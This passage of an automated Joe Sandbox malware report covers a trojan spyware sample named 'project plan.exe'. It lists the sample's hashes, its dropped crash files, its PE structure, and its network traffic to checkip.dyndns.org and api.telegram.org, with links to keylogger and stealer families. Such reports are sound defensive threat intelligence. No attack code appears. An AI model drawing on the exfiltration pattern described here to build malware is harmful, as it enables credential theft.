                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                149.154.167.220
                		api.telegram.orgUnited Kingdom
                		62041TELEGRAMRUtrue
                132.226.247.73
                		checkip.dyndns.comUnited States
                		16989UTMEMUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1466687
                Start date and time:2024-07-03 09:27:14 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 18s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:project plan.exe
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winEXE@10/5@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 93%
                • Number of executed functions: 117
                • Number of non-executed functions: 8
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.189.173.22
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:28:06API Interceptor1x Sleep call for process: RegAsm.exe modified
                03:28:17API Interceptor1x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                149.154.167.220Safeguard and Grow Your Assets.htmlGet hashmaliciousUnknownBrowse
                  Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                    Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                      Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                        hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                          Evo Resou_nls..scr.exeGet hashmaliciousAsyncRATBrowse
                            Wave.exeGet hashmaliciousXWormBrowse
                              RFQ 52165 Materiale vario OENAGROUP.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                New Order Ergun Makina Hirdavat Tic #102718.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                  132.226.247.73MT_01452_03607PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  oHchwlxMNG.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  vsl particulars packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  itinerary_1719382117.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  Halkbank_Ekstre_20240625_082306_910668.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  242010.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  Baltic questionnaire.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.23220.28486.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/
                                  SecuriteInfo.com.Win32.TrojanX-gen.29327.20826.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • checkip.dyndns.org/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  checkip.dyndns.comIMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 158.101.44.242
                                  MT_01452_03607PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 132.226.247.73
                                  PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 193.122.6.168
                                  whiteee.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 193.122.6.168
                                  whiteee.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 158.101.44.242
                                  lista de cotizaciones.xlam.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169
                                  Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169
                                  PM114079-990528.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 193.122.6.168
                                  Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
                                  • 158.101.44.242
                                  api.telegram.orgSafeguard and Grow Your Assets.htmlGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                                  • 149.154.167.220
                                  hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                  • 149.154.167.220
                                  Wave.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  RFQ 52165 Materiale vario OENAGROUP.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 149.154.167.220
                                  New Order Ergun Makina Hirdavat Tic #102718.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                  • 149.154.167.220
                                  Kyeryong Construction - Products List & Spec.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 149.154.167.220

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  TELEGRAMRUSafeguard and Grow Your Assets.htmlGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  82xul16VKj.exeGet hashmaliciousCryptOne, VidarBrowse
                                  • 149.154.167.99
                                  https://sula.starladeroff.com/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  https://tr.alertsgame.ru/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                  • 149.154.167.99
                                  pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                                  • 149.154.167.99
                                  https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                  • 149.154.167.99
                                  UTMEMUSMT_01452_03607PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 132.226.247.73
                                  lista de cotizaciones.xlam.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169
                                  Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169
                                  oHchwlxMNG.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.247.73
                                  scan copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169
                                  CDMZxujRpn.elfGet hashmaliciousMiraiBrowse
                                  • 132.192.25.142
                                  vsl particulars packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.247.73
                                  Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.247.73
                                  LETTER OF AUTHORIZATION.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169
                                  Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.8.169

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eInquiry Studbolt - 240703.vbeGet hashmaliciousGuLoaderBrowse
                                  • 149.154.167.220
                                  2024.scr.exeGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  Enquiry Quote - 24071834-01.vbsGet hashmaliciousGuLoaderBrowse
                                  • 149.154.167.220
                                  DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  2669976595_366408723_KHI_SOF_240702_0957_P.vbsGet hashmaliciousGuLoaderBrowse
                                  • 149.154.167.220
                                  DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbsGet hashmaliciousGuLoaderBrowse
                                  • 149.154.167.220
                                  AF85714759_htm#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 149.154.167.220
                                  Zapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 149.154.167.220
                                  B24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 149.154.167.220
                                  Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 149.154.167.220

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_project plan.exe_feb5e1bf740ebfcc66821499cd5ec33f8925b97_c0f593ef_8deeed97-6c03-4b0a-a0b8-fcfe0b574727\Report.wer

                                  Download File
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0365186031279516
                                  Encrypted:false
                                  SSDEEP:384:Fs82o+GuizUnUFaGmCFzuiFTY4lO8ybY:682VIUnUFaOzuiFTY4lO8
                                  MD5:C132D4B0E3674820607E68F2CA7C5CCA
                                  SHA1:923A9BCC498E12F712B1E7AFA7A9B9AD25C5804C
                                  SHA-256:49C9BF61DC9C2C08ED4577AE230B336677B4127795BE5A205C801460C22DD082
                                  SHA-512:3D02EAAE678F999B26117EE7EFACBEE8288A31BEE945AB3D20CCE0259BF634253BB2DBF97E984BA064E3D3C7B7CAACF9E2F988760F024FB08B094D8904EAC3DB
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.6.5.2.7.8.7.7.1.8.3.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.6.5.2.7.9.3.9.6.8.3.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.e.e.e.d.9.7.-.6.c.0.3.-.4.b.0.a.-.a.0.b.8.-.f.c.f.e.0.b.5.7.4.7.2.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.1.5.c.2.3.d.-.8.1.6.e.-.4.f.d.1.-.b.8.d.e.-.4.5.0.5.9.8.b.1.8.f.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.r.o.j.e.c.t. .p.l.a.n...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.r.u.l.o.g.i.x.i.h.e.j.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.0.0.-.0.0.0.1.-.0.0.1.4.-.0.7.8.b.-.2.d.8.6.1.a.c.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.8.b.5.8.6.a.4.f.a.b.a.b.2.7.9.5.e.2.8.4.7.6.7.b.8.9.7.a.3.f.3.0.0.0.0.0.0.0.0.!.0.0.0.0.2.d.3.7.6.1.4.b.b.0.7.5.a.8.5.8.0.f.c.5.f.e.7.8.5.1.d.e.d.b.c.8.8.9.1.1.9.4.4.c.!.p.r.o.j.e.c.t.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE5D.tmp.dmp

                                  Download File
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Mini DuMP crash report, 16 streams, Wed Jul 3 07:27:59 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):425157
                                  Entropy (8bit):3.372526431202278
                                  Encrypted:false
                                  SSDEEP:3072:lBHM9MYL24TVJ9cSaFFVDovuzkFhEdh0U1CCqqB6Z3+vj12O84P:lBHMaPuVXaqvuzhD3qm6Z3Q3
                                  MD5:331FA175A52E693D94E9A815D73B4C5F
                                  SHA1:3445A52A3F1CD49998796E511BDC9F47CCB63B49
                                  SHA-256:32FEEF063CD7E25F99BAC72827678829EE4EB3560F2A9AC93FAD296ABF51A83D
                                  SHA-512:D782F412C77343C465BFA0F5A1C5F29B932B7681F89FE4D5D0DAAC64BD4E0C643C0C78FB29885651FBE2FE1B5401B85070F407DFD81983F8B7E2B7749DC0EA39
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP..a..... ..........f....................................$........................I..dv..........l.......8...........T............(..=T...........8...........:..............................................................................eJ......d;......Lw......................T...........|..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFA7.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8812
                                  Entropy (8bit):3.711282976935528
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJuPLyy46YEIcCP+Kgmfzn48prI89b6vFcfUTU/m:R6lXJuL346YEDCPtgmfzn4s6vOfUw+
                                  MD5:A163BEC480701011F68FFB794614EEAD
                                  SHA1:1A1D829D2BB758B7C7BE780CAD2BFB0F1DFC393F
                                  SHA-256:02A35452980E952B3ED19023AAAA7644448E40BB7B050A3D7D84778525E9DB31
                                  SHA-512:97BD7DE534E31368EB553166BFD6741EFDFDB664DBCD5F5BC15DD3DFB056E671CEBBEA0568DDB11666A530DD894BA881A17D9E6EFC9F8DA99E244F56C763D629
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.3.6.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE005.tmp.xml

                                  Download File
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4773
                                  Entropy (8bit):4.503460048051616
                                  Encrypted:false
                                  SSDEEP:96:uIjfnI7Ql7VqfJQlfmsiDx1JWiS03iS7d:uIzYQl7cIfmzHZS0ySp
                                  MD5:0EFE6EED1D0BEFC396A9A8D7020E94D4
                                  SHA1:F1A3A8D6FE719D58C7E083E3F8ABF6CEA4CF27B8
                                  SHA-256:D85457FE32D2E0F03F6A81E58A583FD5B672F7913D1F55B967D69E1A3C2CF215
                                  SHA-512:EA47205A5175A42BE76022A48656C9254167F3AD47690A7A714B50E948A75B8BF0D74312BE9437EE126625A278FF443783797A8C5A5B55B5623A11A65B51C732
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="394470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421998644376424
                                  Encrypted:false
                                  SSDEEP:6144:1Svfpi6ceLP/9skLmb0OTXWSPHaJG8nAgeMZMMhA2fX4WABlEnNK0uhiTw:8vloTXW+EZMM6DFyM03w
                                  MD5:D8386AC77A9B11F3298C567B2F6BFB0C
                                  SHA1:DF9E1E8C97630C5DFE92F9FDFA2B5A453A4CA409
                                  SHA-256:0977A2F11505B2C44E8EFE0B4635DB5AFB1E02A837C057DF2DD9FD2F1B88901F
                                  SHA-512:3CFBDDECEEB9FDB1138959EAB02A9E0843C637C8E217102BCE91D0649243DE071E0CF9C6FA2BD1F95883686A71BBE2F617D43FB6791DA3D996C1494FC5CDC066
                                  Malicious:false
                                  Reputation:low
                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.qu.................................................................................................................................................................................................................................................................................................................................................Vvc.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.2802833721596025
                                  TrID:
                                  • Win64 Executable Console Net Framework (206006/5) 48.58%
                                  • Win64 Executable Console (202006/5) 47.64%
                                  • Win64 Executable (generic) (12005/4) 2.83%
                                  • Generic Win/DOS Executable (2004/3) 0.47%
                                  • DOS Executable Generic (2002/1) 0.47%
                                  File name:project plan.exe
                                  File size:2'939'959 bytes
                                  MD5:ec263cafbd93faeb218574586bf8e45f
                                  SHA1:2d37614bb075a8580fc5fe7851dedbc88911944c
                                  SHA256:7c801923836d6b568d00a338b6bcf41889a7a9150c41a4274c21e50d9eb86f33
                                  SHA512:cd2f79fcd7cb5a7dc405f7cfd21c47d6ae6557f3a8967b9ba8b466a2e55425d79586b4cb153f69fe8488cc1bd4037e76dafcab29e122b90b3a9a859fbf4601ee
                                  SSDEEP:12288:6ZeDWntewRLkHfkWWAH0tbERlDqKtsR6g:hDeewxUgtQ3qKtsRn
                                  TLSH:7AD51224B6539C43FF68547AC0E231F50AFDAC2BB0F1A44FDF946C8199624BD27916B2
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(..f.........."...0.Z~............... ....@...... ....................................`................................

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x400000
                                  Entrypoint Section:
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6683E928 [Tue Jul 2 11:48:56 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:

                                  Entrypoint Preview

                                  Instruction
                                  dec ebp
                                  pop edx
                                  nop
                                  add byte ptr [ebx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x9ac.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x9dbe0x1c.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x7e5a0x800000d3d9ec62aedafc315e13fe1a8e24dfFalse0.619659423828125data6.4056746280235135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0xa0000x9ac0xa001499d6da2aa3276dd945e2ef9e380bbcFalse0.3078125data4.208644838669497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0xa0b80x384data0.4855555555555556
                                  RT_VERSION0xa43c0x384dataEnglishUnited States0.49333333333333335
                                  RT_MANIFEST0xa7c00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 3, 2024 09:27:59.145376921 CEST4970480192.168.2.5132.226.247.73
                                  Jul 3, 2024 09:27:59.150438070 CEST8049704132.226.247.73192.168.2.5
                                  Jul 3, 2024 09:27:59.150511026 CEST4970480192.168.2.5132.226.247.73
                                  Jul 3, 2024 09:27:59.150829077 CEST4970480192.168.2.5132.226.247.73
                                  Jul 3, 2024 09:27:59.155960083 CEST8049704132.226.247.73192.168.2.5
                                  Jul 3, 2024 09:27:59.836782932 CEST8049704132.226.247.73192.168.2.5
                                  Jul 3, 2024 09:27:59.890115023 CEST4970480192.168.2.5132.226.247.73
                                  Jul 3, 2024 09:28:05.368868113 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:05.368895054 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:05.369019985 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:05.373893023 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:05.373903036 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:05.989229918 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:05.989320993 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:05.993237972 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:05.993248940 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:05.993514061 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:06.036619902 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:06.084498882 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:06.084615946 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:06.084624052 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:06.462151051 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:06.462233067 CEST44349711149.154.167.220192.168.2.5
                                  Jul 3, 2024 09:28:06.462301970 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:28:06.465882063 CEST49711443192.168.2.5149.154.167.220
                                  Jul 3, 2024 09:29:04.834810019 CEST8049704132.226.247.73192.168.2.5
                                  Jul 3, 2024 09:29:04.834989071 CEST4970480192.168.2.5132.226.247.73
                                  Jul 3, 2024 09:29:39.843600035 CEST4970480192.168.2.5132.226.247.73
                                  Jul 3, 2024 09:29:39.848464966 CEST8049704132.226.247.73192.168.2.5

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 3, 2024 09:27:59.097207069 CEST5364453192.168.2.51.1.1.1
                                  Jul 3, 2024 09:27:59.106723070 CEST53536441.1.1.1192.168.2.5
                                  Jul 3, 2024 09:28:05.360338926 CEST6490653192.168.2.51.1.1.1
                                  Jul 3, 2024 09:28:05.368093967 CEST53649061.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 3, 2024 09:27:59.097207069 CEST192.168.2.51.1.1.10x8226Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                  Jul 3, 2024 09:28:05.360338926 CEST192.168.2.51.1.1.10xf452Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 3, 2024 09:27:59.106723070 CEST1.1.1.1192.168.2.50x8226No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                  Jul 3, 2024 09:27:59.106723070 CEST1.1.1.1192.168.2.50x8226No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                  Jul 3, 2024 09:27:59.106723070 CEST1.1.1.1192.168.2.50x8226No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                  Jul 3, 2024 09:27:59.106723070 CEST1.1.1.1192.168.2.50x8226No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                  Jul 3, 2024 09:27:59.106723070 CEST1.1.1.1192.168.2.50x8226No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                  Jul 3, 2024 09:27:59.106723070 CEST1.1.1.1192.168.2.50x8226No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                  Jul 3, 2024 09:28:05.368093967 CEST1.1.1.1192.168.2.50xf452No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • api.telegram.org
                                  • checkip.dyndns.org

                                  HTTP Packets

